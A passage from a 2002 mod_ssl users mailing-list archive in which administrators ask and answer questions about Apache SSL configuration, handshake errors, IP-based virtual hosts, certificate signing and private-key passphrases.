Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Agnostic (Greek) = Ignoramus (Latin) - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk 14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 15:17:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA28351; Tue, 5 Feb 2002 15:16:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from plmler2.mail.eds.com id PAA28332; Tue, 5 Feb 2002 15:15:27 +0100 (MET) Received: from plmlir1.mail.eds.com (plmlir1-2.mail.eds.com [199.228.143.132]) by plmler2.mail.eds.com (8.11.6/8.11.3) with ESMTP id g15EFP715591 for ; Tue, 5 Feb 2002 08:15:26 -0600 Received: from plmlir1.mail.eds.com (localhost [127.0.0.1]) by plmlir1.mail.eds.com (8.11.6/8.11.3) with ESMTP id g15EFNi28509 for ; Tue, 5 Feb 2002 08:15:23 -0600 (CST) Received: from usplm002.exch.eds.com (USPLM002.txpln.us.eds.com [198.132.135.7]) by plmlir1.mail.eds.com (8.11.6/8.11.3) with ESMTP id g15EFMp28488 for ; Tue, 5 Feb 2002 08:15:22 -0600 (CST) Received: by USPLM002.txpln.us.eds.com with Internet Mail Service (5.5.2655.51) id ; Tue, 5 Feb 2002 09:15:24 -0500 Message-ID: <8A87A19E6153D4119FA800508BDF0932E0E2F9@USHEM202> From: "Kuczborski, Carol L" To: "'modssl-users@modssl.org'" Subject: RE: Connection hangs when using SSL Date: Tue, 5 Feb 2002 09:15:18 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.51) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1AE4F.89F26C60" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kuczborski, Carol L" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1AE4F.89F26C60 Content-Type: text/plain Try making this change to the httpd.conf file. I know the FAQ for mod_ssl recommends the directive you are currently using, but I also saw things similar to your behavior when I tried forcing the use of HTTP 1.0 instead of HTTP 1.1. I also had to remove the nokeepalive due to intermittent "Cannot find server or DNS errors" I received when using the IE browser. SetEnvIf User-Agent ".*MSIE.*"ssl-unclean-shutdown Carol Kuczborski EDS - Enabling Business Solutions MS A6N-B47 13600 EDS Drive Herndon, VA 20171 * phone: +01-703-742-1025 (8-432) * mailto:carol.kuczborski@eds.com www.eds.com -----Original Message----- From: Ken Tune [mailto:ktune@totemvaluations.com] Sent: Monday, February 04, 2002 1:03 PM To: 'modssl-users@openssl.org' Subject: Connection hangs when using SSL I'm trying to get Apache up and running on WinNT, with SSL I'm using Apache/1.3.19 (Win32) mod_ssl/2.8.3 OpenSSL/0.9.6a My Apache config is as follows ... SSLMutex sem SSLRandomSeed startup builtin SSLRandomSeed connect builtin SSLSessionCache none SSLLog logs/SSL.log SSLLogLevel debug :443> ServerName SSLEngine on SSLCipherSuite ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile D:/apache/ssl/my-server.cert SSLCertificateKeyFile D:/apache/ssl/my-server.key SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 CustomLog logs/ssl_request_log combined My problem is that when I issue https:// through the browser the browser simply hangs - there's no response from apache. If I try and connect to 443 directly using openssl I get $ openssl s_client -connect :443 -state -debug CONNECTED(00000003) SSL_connect:before/connect initialization write to 0A01ED48 [0A01F788] (130 bytes => 130 (0x82)) 0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 00 ......W... ..... 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 05 .........f...... 0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 00 ................ 0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 00 .e..d..c..b..a.. 0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 14 `...........@... 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ 0060 - 00 80 46 fe 76 0c 2a 63-8a 04 72 25 77 e3 3c 15 ..F.v.*c..r%w.<. 0070 - 22 77 46 a4 69 b9 20 85-03 7d 7b ad 85 b9 db ed "wF.i. ..}{..... 0080 - b6 1c .. SSL_connect:SSLv2/v3 write client hello A ... and nothing more. I've tried using the -ssl2 and -ssl3 flags, but get the same result. I've tried connecting using telnet and trying to speak http to the port and that doesn't work so that's not the issue. Furthermore, when I try and connect I get an entry in my ssl.log ... [04/Feb/2002 17:01:01 00193] [info] Connection to child 4 established (server :443, client ) Any suggestions gratefully received Regards Ken Tune ------_=_NextPart_001_01C1AE4F.89F26C60 Content-Type: text/html Connection hangs when using SSL
Try making this change to the httpd.conf file.  I know the FAQ for mod_ssl recommends the directive you are currently using, but I also saw things similar to your behavior when I tried forcing the use of HTTP 1.0 instead of HTTP 1.1.  I also had to remove the nokeepalive due to intermittent "Cannot find server or DNS errors" I received when using the IE browser. 
 
SetEnvIf User-Agent ".*MSIE.*"ssl-unclean-shutdown
 
Carol Kuczborski
EDS - Enabling Business Solutions
MS A6N-B47
13600 EDS Drive
Herndon, VA 20171

( phone: +01-703-742-1025 (8-432)
+ mailto:carol.kuczborski@eds.com
www.eds.com

-----Original Message-----
From: Ken Tune [mailto:ktune@totemvaluations.com]
Sent: Monday, February 04, 2002 1:03 PM
To: 'modssl-users@openssl.org'
Subject: Connection hangs when using SSL

I'm trying to get Apache up and running on WinNT, with SSL

I'm using

Apache/1.3.19 (Win32)
mod_ssl/2.8.3
OpenSSL/0.9.6a

My Apache config is as follows ...

SSLMutex sem
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLSessionCache none

SSLLog logs/SSL.log
SSLLogLevel debug

<VirtualHost <MY_HOST>:443>
        ServerName <MY_HOST>
        SSLEngine on
        SSLCipherSuite ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

        SSLCertificateFile D:/apache/ssl/my-server.cert
        SSLCertificateKeyFile D:/apache/ssl/my-server.key

        SetEnvIf User-Agent ".*MSIE.*" \
             nokeepalive ssl-unclean-shutdown \
             downgrade-1.0 force-response-1.0
        CustomLog logs/ssl_request_log combined
</VirtualHost>

My problem is that when I issue https://<MY_HOST> through the browser the browser simply hangs  - there's no response from apache.

If I try and connect to 443 directly using openssl I get

$ openssl s_client  -connect  <MY_HOST>:443 -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 0A01ED48 [0A01F788] (130 bytes => 130 (0x82))
0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 00   ......W... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 05   .........f......
0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 00   ................
0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 00   .e..d..c..b..a..
0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 14   `...........@...
0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02   ................
0060 - 00 80 46 fe 76 0c 2a 63-8a 04 72 25 77 e3 3c 15   ..F.v.*c..r%w.<.
0070 - 22 77 46 a4 69 b9 20 85-03 7d 7b ad 85 b9 db ed   "wF.i. ..}{.....
0080 - b6 1c                                             ..
SSL_connect:SSLv2/v3 write client hello A

... and nothing more.

I've tried using the -ssl2 and -ssl3 flags, but get the same result.

I've tried connecting using telnet and trying to speak http to the port and that doesn't work so that's not the issue.

Furthermore, when I try and connect I get an entry in my ssl.log ...

[04/Feb/2002 17:01:01 00193] [info]  Connection to child 4 established (server <MY_HOST>:443, client <MY_IP>)

Any suggestions gratefully received

Regards

Ken Tune

------_=_NextPart_001_01C1AE4F.89F26C60-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 17:05:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA03143; Tue, 5 Feb 2002 17:04:47 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from wellington.cnchost.com id RAA03089; Tue, 5 Feb 2002 17:03:47 +0100 (MET) Received: from LAP012 (adsl-64-171-27-50.dsl.sntc01.pacbell.net [64.171.27.50]) by wellington.cnchost.com id LAA23156; Tue, 5 Feb 2002 11:03:33 -0500 (EST) [ConcentricHost SMTP Relay 1.14] From: "Gilles gros" To: Subject: Error in Apache log : SSL handshake interrupted Date: Tue, 5 Feb 2002 08:03:32 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Gilles gros" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users We have from time to time the following traces in our Apache logs : [Mon Feb 4 08:17:24 2002] [error] mod_ssl: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!] (System error follows) [Mon Feb 4 08:17:24 2002] [error] System: Connection reset by peer (errno:104) Can anyone help us finding what can the problem be related to ? Our apache is 1.3.20 mod_ssl 2.8.4 OpenSSL 0.9.6b. Part of our configuration is : SSLPassPhraseDialog builtin SetEnvIf User-Agent "MSIE [1-4]" nokeepalive \ ssl-unclean-shutdown downgrade-1.0 \ force-response-1.0 SetEnvIf User-Agent "MSIE [5-9]" ssl-unclean-shutdown # # Inter-Process Session Cache: # Configure the SSL Session Cache: First either `none' # or `dbm:/path/to/file' for the mechanism to use and # second the expiring timeout (in seconds). #SSLSessionCache none #SSLSessionCache shm:/opt/apache/logs/ssl_scache(512000) SSLSessionCache dbm:/opt/apache/logs/ssl_scache SSLSessionCacheTimeout 300 # Semaphore: # Configure the path to the mutual explusion semaphore the # SSL engine uses internally for inter-process synchronization. SSLMutex file:/opt/apache/logs/ssl_mutex SSLRandomSeed startup builtin SSLRandomSeed connect builtin SSLEngine on SSLCipherSuite ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL # The certificate files are now located under /opt/apache/conf SSLCertificateFile /opt/apache/conf/XXX.crt SSLCertificateKeyFile /opt/apache/conf/XXX.key ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 18:12:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA07471; Tue, 5 Feb 2002 18:11:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id SAA07453; Tue, 5 Feb 2002 18:10:55 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA04006 for ; Tue, 5 Feb 2002 12:17:05 -0500 Date: Tue, 5 Feb 2002 12:17:05 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: RE: ssl virtual host IP's In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Lat time I checked, and perhaps it has been updated and fixed, it was not a few mere weeks ago, Linuxconf was an open security hole waiting for exploitation. You may want to fix that. Thanks, Ron DuFresne On Tue, 5 Feb 2002, Sir SoilentG_kov wrote: > thanks, > > FYI i used Linuxconf instead of ifconfig (newbie here) and it works > like a champ. > > Jeff > > > -----Original Message----- > > From: owner-modssl-users@modssl.org > > [mailto:owner-modssl-users@modssl.org]On Behalf Of Owen Boyle > > Sent: Tuesday, February 05, 2002 12:38 AM > > To: modssl-users@modssl.org > > Subject: Re: ssl virtual host IP's > > > > > > Sir SoilentG_kov wrote: > > > > > > I've been looking thru the mod_ssl users archives and have > > learned that I > > > can't do SSL on Virtual Hosts that are name based. I've seen that it is > > > possible to use it on Virtual Hosts with IP based. > > > > Correct. Also, port based... > > > > > Are these IP based hosts separate computers or can they be > > "Virtual IP's" > > > all pointing to the same computer? What I want to do is have two domain > > > names routed to my Linux Web Server and have them both have > > separate certs. > > > However, I have no clue how I'd go about setting up two IP's > > that point to > > > the same box... doesn't make sense to me so I'm guessing it's not > > > possible... but would love it if it does. > > > > It is entirely possible. Any single interface card (i.e. the physical > > device, e.g. eth0) can listen to many IP addresses. On an internet > > connected unix machine the basic procedure is: > > > > - obtain two IP addresses (on the same network - e.g. 192.168.1.1 and > > 192.168.1.2) > > - define your two sites in DNS > > (these two points are done via your ISP usually) > > > > - use "ifconfig" to make your NIC listen to the two IPs > > (see man pages for more detail on this command) > > > > - configure apache to "Listen" to the two IPs and > > - define two VHs for each IP e.g. > > > > Listen 192.168.1.1 > > > > ServerName www.site1.com > > DocumentRoot /path/to/site1 > > > > > > Listen 192.168.1.2 > > > > ServerName www.site2.com > > DocumentRoot /path/to/site2 > > > > > > Rgds, > > > > Owen Boyle. > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 18:22:26 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA07972; Tue, 5 Feb 2002 18:21:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id SAA07964; Tue, 5 Feb 2002 18:21:01 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA04081; Tue, 5 Feb 2002 12:27:03 -0500 Date: Tue, 5 Feb 2002 12:27:03 -0500 (EST) From: "R. DuFresne" To: Chris Cooper cc: modssl-users@modssl.org Subject: Re: message headers In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This may well be the fat for your mail reader, but, on the better mail readers, I prefer pine or elm, when it asks how one wishes to reply choosing no on "Use "Reply-To:" address instead of "From:" address?" allows one to reply to both the list and the original sender. Why would one really need to Bcc: the list? Thanks, Ron DuFresne On Tue, 5 Feb 2002, Chris Cooper wrote: > Although modification of the subject by inserting an identifier e.g. > [xxx] helps when ppl BCC a copy to the list (not that that has been a > problem with this list however ;-) > > Re, > Chr!s > > - - - - - - > Chris Cooper c.cooper@ecu.edu.au > Student Service Centre webmaster@ecu.edu.au > Edith Cowan University http://www.ecu.edu.au/ > Pearson Street Tel: +61 8 9273 8652 > Churchlands Fax: +61 8 9273 8000 > - - - - - - > > > >>> dufresne@sysinfo.com 02/05/02 12:11pm >>> > > Thats a shortcoming on your part though, a proper mail reader can > accomplish this chore. > > Thanks, > > Ron DuFresne > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 18:35:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA08591; Tue, 5 Feb 2002 18:34:33 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from qeo02001.t-online.net id SAA08572; Tue, 5 Feb 2002 18:33:53 +0100 (MET) Received: from qeo01007.da.t-online.net (qeo01007.da.t-online.net [192.168.197.4]) by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id SAA11238 for ; Tue, 5 Feb 2002 18:33:47 +0100 Received: from qeo01006.da.t-online.net ([192.168.197.66]) by qeo01007.da.t-online.net (Netscape Messaging Server 4.15) with ESMTP id GR2M4B00.35W for ; Tue, 5 Feb 2002 18:33:47 +0100 Received: from t-online.net ([192.168.193.21]) by qeo01006.da.t-online.net (Netscape Messaging Server 4.15) with ESMTP id GR2M4B00.TR5 for ; Tue, 5 Feb 2002 18:33:47 +0100 Message-ID: <3C60177B.3FC32DA9@t-online.net> Date: Tue, 05 Feb 2002 18:33:47 +0100 From: "Bert Courtin" Organization: T-Online International AG X-Sender: "Bert Courtin" X-Mailer: Mozilla 4.51 [de]C-CCK-MCD DTOS 1999062601 IT/DV NBE (WinNT; U) X-Accept-Language: de,en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Stop mod_ssl from writing errors to the general Apache error logfile Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bert Courtin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I wonder how I can stop mod_ssl from writing errors to the general Apache error logfile. Problem: --------- I set the "SSLLogLevel" directive to none but as documented at http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#ssllog this only means that no dedicated SSL logging is done, but messages of level ``error'' are still written to the general Apache error logfile. What I'm struggling with is that we use a load balancer which does a ssl-connect to the apache server on port 443 to see whether there is someone listening. It does this in a not very smart way (just looks whether it gets a connect) which leads to a log entry as follows: ... [Tue Feb 5 18:03:40 2002] [error] mod_ssl: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!] (System error follows) [Tue Feb 5 18:03:40 2002] [error] System: Connection reset by peer (errno: 131) ... I already disabled to SSLLog but I also don't want SSL-related stuff in my general Apache error logfile and though looking for a way from stopping mod_ssl from writing errors to the general Apache error logfile. Thanks for any help in advance - kind regards, Bert Courtin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 18:55:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA09536; Tue, 5 Feb 2002 18:54:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop8.sttl.uswest.net id SAA09511; Tue, 5 Feb 2002 18:53:18 +0100 (MET) Received: (qmail 90445 invoked by uid 0); 5 Feb 2002 17:53:16 -0000 Received: from sttldslgw34poolb126.sttl.uswest.net (HELO wmtiabertj) (65.102.185.126) by sttlpop8.sttl.uswest.net with SMTP; 5 Feb 2002 17:53:16 -0000 Date: Tue, 5 Feb 2002 09:56:21 -0800 Message-ID: From: "Sir SoilentG_kov" To: modssl-users@modssl.org Subject: RE: ssl virtual host IP's MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal In-Reply-To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Sir SoilentG_kov" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Ron, can you be more specific as to what security hole or who could exploit it? I have sole access directly to my webserver so far as a real terminal. I allow SSH for only a couple of non-root users and that is key based authentication and my FTP is chrooted to the users home folder. i'm starting to get into IP Tables. My server is NAT'ed behind a modem and the webmin port is not open. I figure if someone can get in and exploit Linuxconf then I'm hosed even if I un-install it cuz they can merely get in. Jeff > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of R. DuFresne > Sent: Tuesday, February 05, 2002 9:17 AM > To: modssl-users@modssl.org > Subject: RE: ssl virtual host IP's > > > > Lat time I checked, and perhaps it has been updated and fixed, it was not > a few mere weeks ago, Linuxconf was an open security hole waiting for > exploitation. You may want to fix that. > > Thanks, > > Ron DuFresne > > On Tue, 5 Feb 2002, Sir SoilentG_kov wrote: > > > thanks, > > > > FYI i used Linuxconf instead of ifconfig (newbie here) and it works > > like a champ. > > > > Jeff > > > > > -----Original Message----- > > > From: owner-modssl-users@modssl.org > > > [mailto:owner-modssl-users@modssl.org]On Behalf Of Owen Boyle > > > Sent: Tuesday, February 05, 2002 12:38 AM > > > To: modssl-users@modssl.org > > > Subject: Re: ssl virtual host IP's > > > > > > > > > Sir SoilentG_kov wrote: > > > > > > > > I've been looking thru the mod_ssl users archives and have > > > learned that I > > > > can't do SSL on Virtual Hosts that are name based. I've > seen that it is > > > > possible to use it on Virtual Hosts with IP based. > > > > > > Correct. Also, port based... > > > > > > > Are these IP based hosts separate computers or can they be > > > "Virtual IP's" > > > > all pointing to the same computer? What I want to do is > have two domain > > > > names routed to my Linux Web Server and have them both have > > > separate certs. > > > > However, I have no clue how I'd go about setting up two IP's > > > that point to > > > > the same box... doesn't make sense to me so I'm guessing it's not > > > > possible... but would love it if it does. > > > > > > It is entirely possible. Any single interface card (i.e. the physical > > > device, e.g. eth0) can listen to many IP addresses. On an internet > > > connected unix machine the basic procedure is: > > > > > > - obtain two IP addresses (on the same network - e.g. 192.168.1.1 and > > > 192.168.1.2) > > > - define your two sites in DNS > > > (these two points are done via your ISP usually) > > > > > > - use "ifconfig" to make your NIC listen to the two IPs > > > (see man pages for more detail on this command) > > > > > > - configure apache to "Listen" to the two IPs and > > > - define two VHs for each IP e.g. > > > > > > Listen 192.168.1.1 > > > > > > ServerName www.site1.com > > > DocumentRoot /path/to/site1 > > > > > > > > > Listen 192.168.1.2 > > > > > > ServerName www.site2.com > > > DocumentRoot /path/to/site2 > > > > > > > > > Rgds, > > > > > > Owen Boyle. > > > ______________________________________________________________________ > > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > > User Support Mailing List modssl-users@modssl.org > > > Automated List Manager majordomo@modssl.org > > > > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > -- > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > admin & senior security consultant: sysinfo.com > http://sysinfo.com > > "Cutting the space budget really restores my faith in humanity. It > eliminates dreams, goals, and ideals and lets us get straight to the > business of hate, debauchery, and self-annihilation." > -- Johnny Hart > > testing, only testing, and damn good at it too! > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 19:49:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA12161; Tue, 5 Feb 2002 19:48:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA12132; Tue, 5 Feb 2002 19:47:48 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 71B664CE5F1; Tue, 5 Feb 2002 19:47:48 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g15Ijtb62851; Tue, 5 Feb 2002 19:45:55 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gto-mailer1.bbn.com id RAA03061; Tue, 5 Feb 2002 17:03:15 +0100 (MET) Received: from bamundson (SSH.BBN.COM [192.1.50.70]) by gto-mailer1.bbn.com (8.9.3+Sun/8.9.3) with SMTP id LAA00194 for ; Tue, 5 Feb 2002 11:03:46 -0500 (EST) From: "Brandon Amundson" To: Date: Tue, 5 Feb 2002 11:06:46 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Brandon Amundson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I have a question. We have created a CA using openssl for our apache server which is running on linux.. We currently have more than 200 users that access our site via certificates. Here is what we are having problems doing. We have an IIS Web server which we would like to allow our current certificate users to be able to access with their existing certs. Is it possible to generate a server certificate request on the IIS server and have that signed by the CA on the linux box? If this were possible, would this allow our researchers access to the second website with the same certs? Again, if this is possible, what is the command to have the request signed by the CA? We have attempted this and we continue to get an error. Here is the error. Brandon Amundson BBN Technologies LAB: 703 284 8189 bamundson@bbn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 21:26:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA16912; Tue, 5 Feb 2002 21:25:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web10903.mail.yahoo.com id VAA16885; Tue, 5 Feb 2002 21:24:41 +0100 (MET) Message-ID: <20020205202439.23983.qmail@web10903.mail.yahoo.com> Received: from [206.40.36.2] by web10903.mail.yahoo.com via HTTP; Tue, 05 Feb 2002 12:24:39 PST Date: Tue, 5 Feb 2002 12:24:39 -0800 (PST) From: Pasumarthi Naveen Subject: How do I create a un-encrypted private key (without pass phrase)? To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Pasumarthi Naveen X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I would like to create a un-encrypted private key. Tried couple of combinations with the "-passout" flag for "genrsa" with no luck. Am I on the right track?? Can someone point me / provide the openssl genrsa ...... command to create a private key without user input of a PEM passphrase alternatively is it possible for the passphrase be read from a file? I understand this approach is not secure... Thanks a bunch, Naveen __________________________________________________ Do You Yahoo!? Send FREE Valentine eCards with Yahoo! Greetings! http://greetings.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 22:49:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA20922; Tue, 5 Feb 2002 22:48:31 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web10908.mail.yahoo.com id WAA20884; Tue, 5 Feb 2002 22:47:32 +0100 (MET) Message-ID: <20020205214730.46171.qmail@web10908.mail.yahoo.com> Received: from [206.40.36.2] by web10908.mail.yahoo.com via HTTP; Tue, 05 Feb 2002 13:47:30 PST Date: Tue, 5 Feb 2002 13:47:30 -0800 (PST) From: Pasumarthi Naveen 